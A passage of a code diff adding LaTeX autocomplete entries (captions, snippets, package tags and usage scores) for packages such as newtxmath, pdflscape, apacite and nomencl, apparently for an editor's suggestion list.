0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'newtxmath-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'newtxmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'newtxmath-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'newtxmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'newtxmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'newtxmath-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'newtxmath-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'newtxmath-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'newtxmath-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'newtxmath-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'newtxmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'newtxmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'newtxmath-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'newtxmath-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'newtxmath-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'newtxmath-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'newtxmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'newtxmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'newtxmath-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'newtxmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'newtxmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'newtxmath-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'newtxmath-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'newtxmath-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'newtxmath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'newtxmath-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'newtxmath-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'newtxmath-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'newtxmath-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'newtxmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'newtxmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'newtxmath-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'newtxmath-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'newtxmath-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'newtxmath-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'newtxmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'newtxmath-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'newtxmath-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'newtxmath-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'newtxmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'newtxmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'newtxmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'newtxmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'newtxmath-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'newtxmath-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'newtxmath-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'newtxmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'newtxmath-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'newtxmath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'newtxmath-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'newtxmath-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'newtxmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'newtxmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'newtxmath-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'newtxmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'newtxmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'newtxmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'newtxmath-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'newtxmath-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'newtxmath-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'newtxmath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'newtxmath-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'newtxmath-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'newtxmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'newtxmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'newtxmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'newtxmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'newtxmath-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'newtxmath-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'newtxmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'newtxmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'newtxmath-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'newtxmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'newtxmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'newtxmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'newtxmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'newtxmath-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'newtxmath-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'newtxmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'newtxmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'newtxmath-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'newtxmath-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'newtxmath-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'newtxmath-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'newtxmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'newtxmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'newtxmath-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'newtxmath-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'newtxmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'newtxmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'newtxmath-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'newtxmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'newtxmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'newtxmath-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'newtxmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'newtxmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'newtxmath-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'newtxmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'newtxmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'newtxmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'newtxmath-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'newtxmath-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'newtxmath-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'newtxmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'newtxmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'newtxmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'newtxmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'newtxmath-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'newtxmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'newtxmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'newtxmath-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'newtxmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'newtxmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'newtxmath-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'newtxmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'newtxmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'newtxmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'newtxmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'newtxmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'newtxmath-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'newtxmath-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'newtxmath-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'newtxmath-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'newtxmath-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'newtxmath-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'newtxmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'newtxmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'newtxmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'newtxmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'newtxmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'newtxmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'newtxmath-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'newtxmath-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'newtxmath-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'newtxmath-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'newtxmath-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'newtxmath-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'newtxmath-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'newtxmath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'newtxmath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'newtxmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'newtxmath-cmd', + score: 0.0063276692758974925, + }, + ], + pdflscape: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pdflscape-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'pdflscape-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pdflscape-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pdflscape-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pdflscape-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pdflscape-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pdflscape-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pdflscape-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pdflscape-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pdflscape-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pdflscape-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pdflscape-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pdflscape-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pdflscape-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pdflscape-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pdflscape-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pdflscape-cmd', + score: 0.004649150613625593, + }, + ], + apacite: [ + { + caption: '\\citep{}', + snippet: '\\citep{$1}', + meta: 'apacite-cmd', + score: 0.2941882834697057, + }, + { + caption: '\\citet{}', + snippet: '\\citet{$1}', + meta: 'apacite-cmd', + score: 0.09046048561361801, + }, + { + caption: '\\url{}', + snippet: '\\url{$1}', + meta: 'apacite-cmd', + score: 0.13586474005868793, + }, + { + caption: '\\BPGS', + snippet: '\\BPGS', + meta: 'apacite-cmd', + score: 0.00023651453263545777, + }, + { + caption: '\\shortcite{}', + snippet: '\\shortcite{$1}', + meta: 'apacite-cmd', + score: 0.010082057767216608, + }, + { + caption: '\\shortciteA{}', + snippet: '\\shortciteA{$1}', + meta: 'apacite-cmd', + score: 0.0011019769466422762, + }, + { + caption: '\\nocite{}', + snippet: '\\nocite{$1}', + meta: 'apacite-cmd', + score: 0.04990693820960752, + }, + { + caption: '\\refname', + snippet: '\\refname', + meta: 'apacite-cmd', + score: 0.006490238196722249, + }, + { + caption: '\\refname{}', + snippet: '\\refname{$1}', + meta: 'apacite-cmd', + score: 0.006490238196722249, + }, + { + caption: '\\citeA{}', + snippet: '\\citeA{$1}', + meta: 'apacite-cmd', + score: 0.008470555729707068, + }, + { + caption: '\\citeyear{}', + snippet: '\\citeyear{$1}', + meta: 'apacite-cmd', + score: 0.01091041305836494, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'apacite-cmd', + score: 2.341195220791228, + }, + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'apacite-cmd', + score: 0.2659628337907604, + }, + { + caption: '\\BPG', + snippet: '\\BPG', + meta: 'apacite-cmd', + score: 0.00023651453263545777, + }, + { + caption: '\\citeNP{}', + snippet: '\\citeNP{$1}', + meta: 'apacite-cmd', + score: 0.0003168688289795556, + }, + { + caption: '\\citeauthor{}', + snippet: '\\citeauthor{$1}', + meta: 'apacite-cmd', + score: 0.01359248786373484, + }, + ], + mathpazo: [ + { + caption: '\\big', + snippet: '\\big', + meta: 'mathpazo-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\mathbb{}', + snippet: '\\mathbb{$1}', + meta: 'mathpazo-cmd', + score: 0.33740449739178857, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'mathpazo-cmd', + score: 0.050370758781422345, + }, + ], + footmisc: [ + { + caption: '\\footref{}', + snippet: '\\footref{$1}', + meta: 'footmisc-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\footref', + snippet: '\\footref', + meta: 'footmisc-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'footmisc-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\multfootsep', + snippet: '\\multfootsep', + meta: 'footmisc-cmd', + score: 0.00010171098214158578, + }, + { + caption: '\\footnotelayout', + snippet: '\\footnotelayout', + meta: 'footmisc-cmd', + score: 0.0004535003423927585, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'footmisc-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'footmisc-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'footmisc-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\thefootnote', + snippet: '\\thefootnote', + meta: 'footmisc-cmd', + score: 0.007676927812687567, + }, + { + caption: '\\thefootnote{}', + snippet: '\\thefootnote{$1}', + meta: 'footmisc-cmd', + score: 0.007676927812687567, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'footmisc-cmd', + score: 0.1789117552185788, + }, + ], + fixltx2e: [ + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'fixltx2e-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'fixltx2e-cmd', + score: 0.354445763583904, + }, + { + caption: '\\textsubscript{}', + snippet: '\\textsubscript{$1}', + meta: 'fixltx2e-cmd', + score: 0.058405875394131175, + }, + { + caption: '\\em', + snippet: '\\em', + meta: 'fixltx2e-cmd', + score: 0.10357353994640862, + }, + ], + sidecap: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'sidecap-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'sidecap-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\sidecaptionvpos{}{}', + snippet: '\\sidecaptionvpos{$1}{$2}', + meta: 'sidecap-cmd', + score: 0.0006587927449241846, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'sidecap-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'sidecap-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'sidecap-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'sidecap-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'sidecap-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'sidecap-cmd', + score: 0.0018957469739775527, + }, + ], + nomencl: [ + { + caption: '\\nomenclature[]{}{}', + snippet: '\\nomenclature[$1]{$2}{$3}', + meta: 'nomencl-cmd', + score: 0.016053526743355948, + }, + { + caption: '\\nomenclature{}{}', + snippet: '\\nomenclature{$1}{$2}', + meta: 'nomencl-cmd', + score: 0.016053526743355948, + }, + { + caption: '\\nomlabel', + snippet: '\\nomlabel', + meta: 'nomencl-cmd', + score: 6.353668036093916e-5, + }, + { + caption: '\\printnomenclature', + snippet: '\\printnomenclature', + meta: 'nomencl-cmd', + score: 0.0014526113324237952, + }, + { + caption: '\\printnomenclature[]', + snippet: '\\printnomenclature[$1]', + meta: 'nomencl-cmd', + score: 0.0014526113324237952, + }, + { + caption: '\\makenomenclature', + snippet: '\\makenomenclature', + meta: 'nomencl-cmd', + score: 0.002310610204652063, + }, + { + caption: '\\nomgroup', + snippet: '\\nomgroup', + meta: 'nomencl-cmd', + score: 0.0005549290951493257, + }, + { + caption: '\\nomgroup[]{}', + snippet: '\\nomgroup[$1]{$2}', + meta: 'nomencl-cmd', + score: 0.0005549290951493257, + }, + { + caption: '\\nomname', + snippet: '\\nomname', + meta: 'nomencl-cmd', + score: 0.0015092617929470952, + }, + { + caption: '\\nompreamble', + snippet: '\\nompreamble', + meta: 'nomencl-cmd', + score: 2.4350510995473236e-5, + }, + { + caption: '\\nomentryend', + snippet: '\\nomentryend', + meta: 'nomencl-cmd', + score: 0.000137692304514793, + }, + ], + afterpage: [ + { + caption: '\\afterpage{}', + snippet: '\\afterpage{$1}', + meta: 'afterpage-cmd', + score: 0.0018578070791608345, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'afterpage-cmd', + score: 0.1789117552185788, + }, + ], + titling: [ + { + caption: '\\thanks{}', + snippet: '\\thanks{$1}', + meta: 'titling-cmd', + score: 0.08382259880654083, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'titling-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\posttitle{}', + snippet: '\\posttitle{$1}', + meta: 'titling-cmd', + score: 0.002507149245154055, + }, + { + caption: '\\postdate{}', + snippet: '\\postdate{$1}', + meta: 'titling-cmd', + score: 0.002139478682489868, + }, + { + caption: '\\predate{}', + snippet: '\\predate{$1}', + meta: 'titling-cmd', + score: 0.002139478682489868, + }, + { + caption: 